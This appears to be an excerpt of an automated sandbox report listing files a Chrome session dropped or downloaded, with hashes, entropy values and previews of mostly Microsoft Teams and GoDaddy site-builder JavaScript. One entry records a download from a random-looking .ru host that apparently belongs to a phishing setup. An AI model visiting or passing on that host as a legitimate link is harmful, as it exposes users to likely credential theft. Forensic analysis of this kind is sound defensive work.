                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[618332],{618332:(e,C,s)=>{s.d(C,{a:()=>n});var a=s(957032),t=s(395225),l=s.n(t),c=s(485529),i=s(829289);const n=(0,c.Ke)({svg:({classes:e})=>(0,a.Y)("svg",{role:"presentation",viewBox:"0 0 32 32",className:e.svg,children:[(0,a.Y)("g",{className:l()(i.Q.outline,e.outlinePart),children:(0,a.Y)("path",{d:"M16 30H2V16C2 8.26801 8.26801 2 16 2C23.732 2 30 8.26801 30 16C30 23.732 23.732 30 16 30ZM10 21V16C10 12.6863 12.6863 10 16 10C19.3137 10 22 12.6863 22 16C22 19.3137 19.3137 22 16 22H11.946C11.6621 24.5935 10.288 26.6306 8.51875 28H16C22.6274 28 28 22.6274 28 16C28 9.37258 22.6274 4 16 4C9.37258 4 4 9.37258 4 16V27.9112C6.86035 27.4156 10 24.8723 10 21ZM16 20C18.2091 20 20 18.2091 20 16C20 13.7909 18.2091 12 16 12C13.7909 12 12 13.7909 12 16V20H16Z"})}),(0,a.Y)("g",{className:l()(i.Q.filled,e.filledPart),children:(0,a.Y)("path",{d:"M30 16C30 8.26801 23.732 2 16 2C8.26801 2 2 8.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:C source, ASCII text, with very long lines (31079)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):31187
                                                                                                                                                                                                                          Entropy (8bit):5.577750537080333
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:L9lV92QKBflQ1CHbn4foz69ej0X5WxHVj9GuaDW0W3SXx/m6oAMCptGIbSm9jR/q:b2QKQ1c+XeGuaDW0eSXNm6opCptrO7T
                                                                                                                                                                                                                          MD5:3AE734C6277E141B4665216834695A23
                                                                                                                                                                                                                          SHA1:B84FCA7C9CBEE69C06A953D3F8EFCD8232870EF1
                                                                                                                                                                                                                          SHA-256:200EB51F54A66D61AE8ECA875DABD02B6A56A84AF421AE84E65F4C3467F6BF03
                                                                                                                                                                                                                          SHA-512:F50E9298867242EAD97A186B5ACA667C757945CB3B1EBC8F934F13FDBA63FE3732C58C7A32DA1EB899129F585D65A29815F7F0D8876896B349F77411A5965283
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[453394],{471735:(e,t,a)=>{a.d(t,{nv:()=>i,JT:()=>s,iO:()=>r});var n=a(332752),o=a(848020);const i=e=>e.get(n.w.Auth).buildCloud,s=(e,t)=>{const a=t?.get(n.w.Auth).cloudDomainMap;if(!a)return;const i=a.find((t=>t.domain===e))?.cloud;return i?o.el[i]:void 0},r=(e,t,a)=>{const o=t?.get(n.w.Auth).cloudDomainMap;if(!o||!e)return"";const i=o.find((t=>t.cloud===e))?.domain;return i?a?`https://${i}/`:`https://${i}/v2/`:""}},916042:(e,t,a)=>{a.d(t,{dz:()=>r,cd:()=>l,BD:()=>c,bo:()=>p,iy:()=>d,cF:()=>m,$f:()=>f,sB:()=>C,t5:()=>u,iX:()=>h,lO:()=>g});var n=a(170962),o=a(374348),i=a(332752),s=a(471735);const r=n.d,l=n.t.isLegacyMeetingUrl,c=n.t.isMeetingUrl,p=n.t.isTFLMeetingURL,d=n.t.getMeetingLegacyURL,m=(e,t)=>{const{enableIsTfwCloud:a}=t.get(i.w.Calling);return a?n.t.isTFWCloud((0,s.JT)(e,t)):n.t.isTFWDomain(e)},f=(e,t)=>{if(t){const a=(0,s.JT)(new URL(t).host,e);return!!a&&a!==(0,s.n
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (23865)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):23973
                                                                                                                                                                                                                          Entropy (8bit):5.061416340897368
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:WK8oz4zTk9y1b23kwfxZ8ZyWT+aTx919J63THsp+MaohwYz8XWOFmTRvVMBKJOHp:J8E4zTk/kwf/8ZyWT+aT163THO+MNOYQ
                                                                                                                                                                                                                          MD5:EDDB2A60AB61195FF094AE85C1DE3815
                                                                                                                                                                                                                          SHA1:F94EE597E6C191263FE264045F892F2F922F6D7C
                                                                                                                                                                                                                          SHA-256:4A4F93510554358AA41E4CF43916D09A24D69B9F8156857794B37D2AB6498C16
                                                                                                                                                                                                                          SHA-512:AE67BADE2413A160DFD7BBA53CF2131EAB65F490B70B9C42927C7900401F872A0931379A18E2AFBBA1ACCA093CD39C72BF3DFC38558179B4827623E02A610217
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[965787],{859960:function(t,e,n){var o,i=this&&this.__extends||(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n])},function(t,e){function n(){this.constructor=t}o(t,e),t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)});Object.defineProperty(e,"__esModule",{value:!0});var r=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return i(e,t),e}(n(844549).default);e.default=r},844549:(t,e,n)=>{Object.defineProperty(e,"__esModule",{value:!0});var o=n(743203),i=n(139052),r=function(){function t(t){this.root=null,this.compare=t||o.defaultCompare,this.nElements=0}return t.prototype.add=function(t){return!o.isUndefined(t)&&(null!==this.insertNode(this.createNode(t))&&(this.nElements++,!0))},t.prototype.clear=function(){this.root=null,this.nElements=
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (829)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):876
                                                                                                                                                                                                                          Entropy (8bit):5.561256771975726
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:cEBLv5pqMIuHMnH7cmo17Jv0ySaUKdei9hJQE2HrIYpb:f75pqaowmWJcySaUKdTfcrIC
                                                                                                                                                                                                                          MD5:9219CF782ED219BD3929A51E99503BC2
                                                                                                                                                                                                                          SHA1:6AAC399854EC0405949566FAFDCA8C121F0CDA58
                                                                                                                                                                                                                          SHA-256:89388608D7BCECED5AD74231681FFCE822AD580ACB9FD7E492970176E3E38347
                                                                                                                                                                                                                          SHA-512:D421851026422D46E1561FA852084CE7B41E32C7451DCF85900838265D330F09389DA18F4D8A5FAF3E0A4076508BA7E93EA9C5F8B5B32ACF32205C9B6E65E709
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-index-4e26cd6b.js",["exports"],(function(o){"use strict";const{widgetTypes:e,colorPackCategories:t,themeConstants:n,buttons:l}=(global.Core||guac["@wsb/guac-widget-core"]).constants,s=(global.keyMirror||guac.keymirror)({NONE:null,SMALL_UNDERLINE:null,FULL_UNDERLINE:null,INLINE:null}),i=24,r=n.DEFAULT_OVERLAY_TEXT_SHADOW,a={about4:i,introduction5:i,content5:i,ordering1:i,payment2:i,zillow1:i,reviews1:i,rss1:i,subscribe3:i,mlsSearch1:i,contact10:i,countdown1:i,quote1:i},c={spotlight:{fill:l.fills.SOLID},external:{fill:l.fills.NONE,decoration:l.decorations.NONE,shadow:l.shadows.NONE}};o.A="365px",o.B="24px",o.C=c,o.D=25,o.I=28,o.M=40,o.O="0px 2px 10px rgba(0, 0, 0, 0.3)",o.S=40,o.W={about1:!0},o.a=r,o.b="18px",o.c=a,o.d="600px",o.e=t,o.s=s})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-index-4e26cd6b.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (18335)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):18444
                                                                                                                                                                                                                          Entropy (8bit):5.4219475958291286
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:S0xnbFFqEuCnA8oUWVZtpcpWq4si9exVHreCOLEJny:S0xnbFFqb8jqZtkxVHreCOLEJy
                                                                                                                                                                                                                          MD5:D9EDC1D501F5631A7C4E7C37B1AC280A
                                                                                                                                                                                                                          SHA1:CD94885FEFF710323427C8BAF5850F982FC22890
                                                                                                                                                                                                                          SHA-256:1D60EF14C462EAC63FC9546DDEF168A9BF2F86DE4F148D8F253A0D96D284FB75
                                                                                                                                                                                                                          SHA-512:9966A040C7C492ADCD0F13E7CF6369719A638ADCC80D9F6107038030E968E622C8E1DB74B9321D040450F5B2CB76187E31F4726D0149E52B665CF966A2C10CB0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[52196],{946187:(e,o,r)=>{r.d(o,{C:()=>t});const t={auto:"auto",belowBase:-1,base:0,overBase:1,topOfBase:2,belowSurfaces:3,surfaceMenu:1e3,backdrop:1e3,callout:1e3,tooltip:1010,searchBox:1010,searchBoxSurfaceMenu:1010,monitor:1e3,shell:1030}},742692:(e,o,r)=>{r.d(o,{PtS:()=>a});var t=r(693593);const a={borderColor:t.Pt.borderColor,borderStyle:t.Pt.borderStyle,borderWidth:t.Pt.borderWidth}},820152:(e,o,r)=>{r.d(o,{T:()=>t});const t={v9Icon:()=>({"& svg":{width:"100%",paddingBottom:"100%",margin:"-4px 0 0 -4px",overflow:"visible"},"& .fui-Icon-filled":{display:"none"},"& .fui-Icon-regular":{display:"inline"},"&:hover":{"& .fui-Icon-filled":{display:"inline"},"& .fui-Icon-regular":{display:"none"}}}),v9CustomSizeIcon:()=>({"& svg":{overflow:"visible"},"& .fui-Icon-filled":{display:"none"},"& .fui-Icon-regular":{display:"inline"},"&:hover":{"& .fui-Icon-filled":{display:"inline"},
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):44964
                                                                                                                                                                                                                          Entropy (8bit):7.994075658138993
                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                          SSDEEP:768:oG6BZ8oaJoIcZ29dOBay6XuVx1cnmDsyU+Rl6NLmBV6hmWZIBVgHKX:tHJ9KQdOUN+Bem2+rgCBezIBDX
                                                                                                                                                                                                                          MD5:25C4F8CB66A82EE2D5A26B80BF8F9CDF
                                                                                                                                                                                                                          SHA1:152C710AA40CDEAAD375409DDDB4650D26C7E295
                                                                                                                                                                                                                          SHA-256:3F194835523EBD9400F83902D01682C2F09D486A7BB3516972F0CE3E3E43F932
                                                                                                                                                                                                                          SHA-512:5AE9C26C639E65496BD61BE0899C13A24F5C5F93D433301FAC0F433A20C4E5247294132B6CB1292161AA12C2E76A86A4B14C6D8DBAB11E834CC24ABB872A8A51
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:"https://img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/blob-4f9b682.png/:/rs=w:1535,m"
                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8X...........B..VP8 ....0....*..C.>m2.H$".........gnH..s^r..}..A.P6...e........C..M./.C.........?@...._.s..G.{L.........s......w.>'.=...W.(.-........z.....?..... .}.q\.F..?O.'R%Ig .e......nG.F..o%.M..[D-....[........`...2'CD.m=.....S..V...?.(..`L...=b...`0x.y.).x.r..u....{.9..Y.|6..........?Jg5.k..pa1.E....'.- CB..!zc6....6#...jf.k.n.,.&./Zg...1....{[.b.!.._.k>8..2y....6....`?....O.jm.n.I*..%.O.n~Z...^.....).>.59m....Cl...u.G...g.Z.t..k...z..+6%..X.+.u....W..E.$3.z.N.6..m\.....v....5......N...F...L5...%....<...3.....RK......Y.o.T...Sg#U6\r`G....k.JTqmt.6"..E...B.....t......E.b..E..ws1.6.....>...z......*qHZ..or6q....G.L...>.^...A.3..P.QR..Y.4.].=..1U... V..\...v..Jn.`.8(./...g....;..iMO. ..0D.`...Foh..kJ.r?A...^C5..,S..S..P.,..C[OY.e.2..M.%....|.}7...+..4....,..}...1.A.Lf;..3.......:w.`k....%....{y..T....m.....}...4!..s..#.m.....s.....l.'Y..>.[..dju.S..........~.u;....Cc.3....T..+8$..../g....j.x .`?_.%......D.x...RFMm.~.N...yf.p
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (453)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):507
                                                                                                                                                                                                                          Entropy (8bit):5.441630472495487
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:cTiBSyk+jo5Q8KWOT1DoD3BMXkKOr4SJdC+THr+pWTDX:cTiBLbTnBDqMXSr4SJ8SHrIYDX
                                                                                                                                                                                                                          MD5:41989626C6305D55A0AE7990D7BCB539
                                                                                                                                                                                                                          SHA1:D59C07C80C37F0519C860F802DD9033AB7622A5A
                                                                                                                                                                                                                          SHA-256:4FFB85F3D6A01D0497543DA0E4D003F32FD86304CE931803E542DAF561FD17E9
                                                                                                                                                                                                                          SHA-512:0CD58A5E318F4E689815E369465A826F3B8BD4AF97961A14A229A293E42A1E352E1E0921151FDA0566EBC7D80AE52FCE4EA7A5677DC1563638D22D743C63073D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-overlayTypes-3c1643f3.js",["exports"],(function(e){"use strict";const{headerTreatments:{FILL:o,FIT:n,INSET:t,BLUR:a,LEGACY_BLUR:c,WIDE_INSET:d}}=(global.Core||guac["@wsb/guac-widget-core"]).constants;e.A="accent",e.B=a,e.C="category",e.F=o,e.I="Image",e.L=c,e.N="neutral",e.P="primary",e.S="Slideshow",e.V="Video",e.W=d,e.a="none",e.b=n,e.c=t,e.d="None",e.e="light_dark"})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-overlayTypes-3c1643f3.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (37256)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):37364
                                                                                                                                                                                                                          Entropy (8bit):5.170958810990217
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:BgwG2MtRs/YW7+g5UBj74DvpttZwJbhTJrSK4VxjPHRYOI+AmOkmMOkxp+hg8XFw:UHaYWSg57DvpttZwJbhTJrSK4VxjPHRp
                                                                                                                                                                                                                          MD5:52534697E120336121D1A6AAC1B71E1F
                                                                                                                                                                                                                          SHA1:6E1D1AE84312C249D20F0E215028564CE2DE987A
                                                                                                                                                                                                                          SHA-256:6EDEF2224A589C15EA4E9964C7E419F8FE8DA1492F7A9E0119F55486E10E62D2
                                                                                                                                                                                                                          SHA-512:D3FDDB3E2724B73063249F6DFC96FC0DFC030D4EB696B15CDD1C8A861024489F80E6BE4A82DC86F1109C1CB2D7FA62CBF6BB6307B06ED246A85042CCC93D2C4F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/918681-ba768de32ce52fb9.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[918681],{48374:(r,o,e)=>{e.d(o,{vqc:()=>a,xyI:()=>l,$xS:()=>t,ozo:()=>c,yd$:()=>n,nkM:()=>d,Qpb:()=>u,DoI:()=>g,oam:()=>v,ww0:()=>B,e5x:()=>i,j0c:()=>s,Er0:()=>k,epd:()=>f,uf9:()=>P});const a="Shift",l="Enter",t=" ",c="Tab",n="ArrowDown",d="ArrowLeft",u="ArrowRight",g="ArrowUp",v="End",B="Home",i="PageDown",s="PageUp",k="Backspace",f="Delete",P="Escape"},188206:(r,o,e)=>{e.d(o,{F:()=>t});var a=e(48374),l=e(602835);e(513432);function t(r,o){const{disabled:e,disabledFocusable:t=!1,"aria-disabled":c,onClick:n,onKeyDown:d,onKeyUp:u,...g}=null!=o?o:{},v="string"==typeof c?"true"===c:c,B=e||t||v,i=(0,l.D)((r=>{B?(r.preventDefault(),r.stopPropagation()):null==n||n(r)})),s=(0,l.D)((r=>{if(null==d||d(r),r.isDefaultPrevented())return;const o=r.key;if(B&&(o===a.xyI||o===a.$xS))return r.preventDefault(),void r.stopPropagation();o!==a.$xS?o===a.xyI&&(r.preventDefault(),r.currentTarget.cli
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ru/qHLFRJZPdOTGGnAgLpZPzySPmqdHWHETPVTWEAMVQJLRSPMAYJAEZKMUSKUMPCY
                                                                                                                                                                                                                          Preview:1
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:C source, ASCII text, with very long lines (31079)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):31187
                                                                                                                                                                                                                          Entropy (8bit):5.577750537080333
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:L9lV92QKBflQ1CHbn4foz69ej0X5WxHVj9GuaDW0W3SXx/m6oAMCptGIbSm9jR/q:b2QKQ1c+XeGuaDW0eSXNm6opCptrO7T
                                                                                                                                                                                                                          MD5:3AE734C6277E141B4665216834695A23
                                                                                                                                                                                                                          SHA1:B84FCA7C9CBEE69C06A953D3F8EFCD8232870EF1
                                                                                                                                                                                                                          SHA-256:200EB51F54A66D61AE8ECA875DABD02B6A56A84AF421AE84E65F4C3467F6BF03
                                                                                                                                                                                                                          SHA-512:F50E9298867242EAD97A186B5ACA667C757945CB3B1EBC8F934F13FDBA63FE3732C58C7A32DA1EB899129F585D65A29815F7F0D8876896B349F77411A5965283
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/453394-e3907e3486cba0fd.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[453394],{471735:(e,t,a)=>{a.d(t,{nv:()=>i,JT:()=>s,iO:()=>r});var n=a(332752),o=a(848020);const i=e=>e.get(n.w.Auth).buildCloud,s=(e,t)=>{const a=t?.get(n.w.Auth).cloudDomainMap;if(!a)return;const i=a.find((t=>t.domain===e))?.cloud;return i?o.el[i]:void 0},r=(e,t,a)=>{const o=t?.get(n.w.Auth).cloudDomainMap;if(!o||!e)return"";const i=o.find((t=>t.cloud===e))?.domain;return i?a?`https://${i}/`:`https://${i}/v2/`:""}},916042:(e,t,a)=>{a.d(t,{dz:()=>r,cd:()=>l,BD:()=>c,bo:()=>p,iy:()=>d,cF:()=>m,$f:()=>f,sB:()=>C,t5:()=>u,iX:()=>h,lO:()=>g});var n=a(170962),o=a(374348),i=a(332752),s=a(471735);const r=n.d,l=n.t.isLegacyMeetingUrl,c=n.t.isMeetingUrl,p=n.t.isTFLMeetingURL,d=n.t.getMeetingLegacyURL,m=(e,t)=>{const{enableIsTfwCloud:a}=t.get(i.w.Calling);return a?n.t.isTFWCloud((0,s.JT)(e,t)):n.t.isTFWDomain(e)},f=(e,t)=>{if(t){const a=(0,s.JT)(new URL(t).host,e);return!!a&&a!==(0,s.n
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2467)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2592
                                                                                                                                                                                                                          Entropy (8bit):4.845876308583554
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:wp3sp3OlsgW0ueB6NsiI1/16xPxUBnBOr1P/tdwZf/TvopbpQDGODGjkWWpC9tje:OsT8YVDwZXad/+r
                                                                                                                                                                                                                          MD5:016A2F33A3DE3F6B0C9DD22D2E891D1F
                                                                                                                                                                                                                          SHA1:0DD5EAC7743D24C1657A84E0CAB23E4E3034E9E3
                                                                                                                                                                                                                          SHA-256:6A2E762D7B9A735DB69AFD281D4B45D0910E7F1CDC5E3F1ECEE6D19170FE65C4
                                                                                                                                                                                                                          SHA-512:478CA92EF47710B70B4C640793862F8041AE6E1592D073E678688DE03F70692BB27405C37A414769BA0B2DB18B39B1296E7C13AC1D286D44DFC2C11EC4F0E0B5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[951405],{568561:(e,r,t)=>{t.r(r),t.d(r,{default:()=>n});const n={namespace:"recurrence",locale:"en-us",translations:{and_separator_format:"{{value1}} and {{value2}}",comma_separator_format:"{{value1}}, {{value2}}",meeting_recurrence_pattern_daily_mf:"{interval, plural, =1{Occurs daily} =2{Occurs every other day} other{Occurs every # days}}",meeting_recurrence_pattern_first_weekInMonth:"First",meeting_recurrence_pattern_first_weekInMonth_lower_case:"first",meeting_recurrence_pattern_fourth_weekInMonth:"Fourth",meeting_recurrence_pattern_fourth_weekInMonth_lower_case:"fourth",meeting_recurrence_pattern_last_weekInMonth:"Last",meeting_recurrence_pattern_last_weekInMonth_lower_case:"last",meeting_recurrence_pattern_monthly_mf:"{interval, plural, =1{Occurs every month on day {day}} =2{Occurs every other month on day {day}} other{Occurs every # months on day {day}}}",meeting_recurr
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):379727
                                                                                                                                                                                                                          Entropy (8bit):5.446662316381847
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:tRX90HwF9lV1LzACQoiifB3itQt4A8TJt6cQ4FZsNCloGnmTdA7nqsCrm1lSTl3:DXSHwIoiifB3itQt4A8TKWoeNksSh
                                                                                                                                                                                                                          MD5:4B2B7C91BE6969BFF259727068C67652
                                                                                                                                                                                                                          SHA1:038D94BDBE621FF5BDA3A6998A07AF1B755D26C3
                                                                                                                                                                                                                          SHA-256:BD2205DDD0A59778B8FD5A0EB70BEC8D67A86A4C5D26F9AF3CB9A41559C89EC4
                                                                                                                                                                                                                          SHA-512:A6F88890FD0C8BD05FCB3E09CC5538074C99DE1B74B361AB74B608700B9A7A27384B6E324F831B0D751DCF10F1E5556BB15773A9D83D483BC44F95A91E05CA39
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/services-calling-service-adapters-cd2e0d2e14b3a345.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[889503,583674,361293],{583674:(e,t)=>{function i(e){return null!=e&&"function"==typeof e.then}function r(e){return null!=e&&"function"==typeof e.cancel}function n(e,i){if(!t.config.catchExceptions)return e();try{return e()}catch(e){return i(e)}}Object.defineProperty(t,"__esModule",{value:!0}),t.config={exceptionsToConsole:!0,catchExceptions:!0,traceEnabled:!1,exceptionHandler:void 0,unhandledErrorHandler:function(e){throw e}},t.fromThenable=function(e){var t=g();return e.then((function(e){t.resolve(e)}),(function(e){t.reject(e)})),t.promise().thenAsync((function(e){return e}))};var s,o=[],a="undefined"!=typeof setImmediate;function l(e){o.push(e),1===o.length&&(a?setImmediate(c):setTimeout(c,0))}function c(){var e=o;o=[];for(var t=0;t<e.length;t++)e[t]()}function g(){return new s.SyncTask}function d(e){return(new s.SyncTask).resolve(e).promise()}function u(e){var t=g(),n=!1;r
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:PNG image data, 51 x 98, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):61
                                                                                                                                                                                                                          Entropy (8bit):4.068159130770306
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:yionv//thPle/N0Z+l8kxl/k4E08up:6v/lhPTZdk7Tp
                                                                                                                                                                                                                          MD5:CF085B9838692D102F64648C42A49FFB
                                                                                                                                                                                                                          SHA1:11907F90EEA144ECDC692739630828DF96998319
                                                                                                                                                                                                                          SHA-256:55A0DF29102247095C7B2B5936AD084EB334189A21D3ED822F4092109846A1EB
                                                                                                                                                                                                                          SHA-512:C89BEDDA5C744CB806AB9110597257C314A60D8312C8F0C1B6A2DF94FFADB0ACC2976EB41704FEAD3533CD3E8E9D0A97CB44D203F4EC8029CDCAC8883A7E22E0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:.PNG........IHDR...3...b.....r.|/....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (6267)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):6375
                                                                                                                                                                                                                          Entropy (8bit):4.832022987269524
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:FrN9ujaDgFoSstYXnF82MJxJlFk2jOFbgrHQw4+sX43Jg4bDWUz0R4IsTBTj:FrN9mo7tYr+nGpuTxj
                                                                                                                                                                                                                          MD5:E3947426289E682F86072FAD145E30FE
                                                                                                                                                                                                                          SHA1:883FA22D817AB2BF256D5780ACA60C519F221554
                                                                                                                                                                                                                          SHA-256:E34614C2F439E569A2D4D5FDDBEC5341E66C3544D6918E37B058E5D9051A9BAB
                                                                                                                                                                                                                          SHA-512:2FA3C2A382D022D3F85DED713E21AEB29908EC829E490D85BD8D8EA4785B715F1C12289200755FC0625B4121794D61D6CD026A17EA79C0F63754C054C6C8B1CA
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[505772],{598476:(e,C,t)=>{t.d(C,{A:()=>r});var a=t(513432),l=t(395225),n=t.n(l),s=t(485529),c=t(829289),r=(0,s.Ke)({svg:function(e){var C=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:C.svg},a.createElement("g",{className:n()(c.Q.outline,C.outlinePart)},a.createElement("path",{d:"M11.5 8.5C11.5 8.22386 11.2761 8 11 8H9V6C9 5.72386 8.77614 5.5 8.5 5.5C8.22386 5.5 8 5.72386 8 6V8H6C5.72386 8 5.5 8.22386 5.5 8.5C5.5 8.77614 5.72386 9 6 9H8V11C8 11.2761 8.22386 11.5 8.5 11.5C8.77614 11.5 9 11.2761 9 11V9H11C11.2761 9 11.5 8.77614 11.5 8.5Z"}),a.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M8.5 3C11.5376 3 14 5.46243 14 8.5C14 9.83879 13.5217 11.0659 12.7266 12.0196L16.8536 16.1464C17.0488 16.3417 17.0488 16.6583 16.8536 16.8536C16.68 17.0271 16.4106 17.0464 16.2157 16.9114L16.1464 16.8536L12.0196 12.7
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):111655
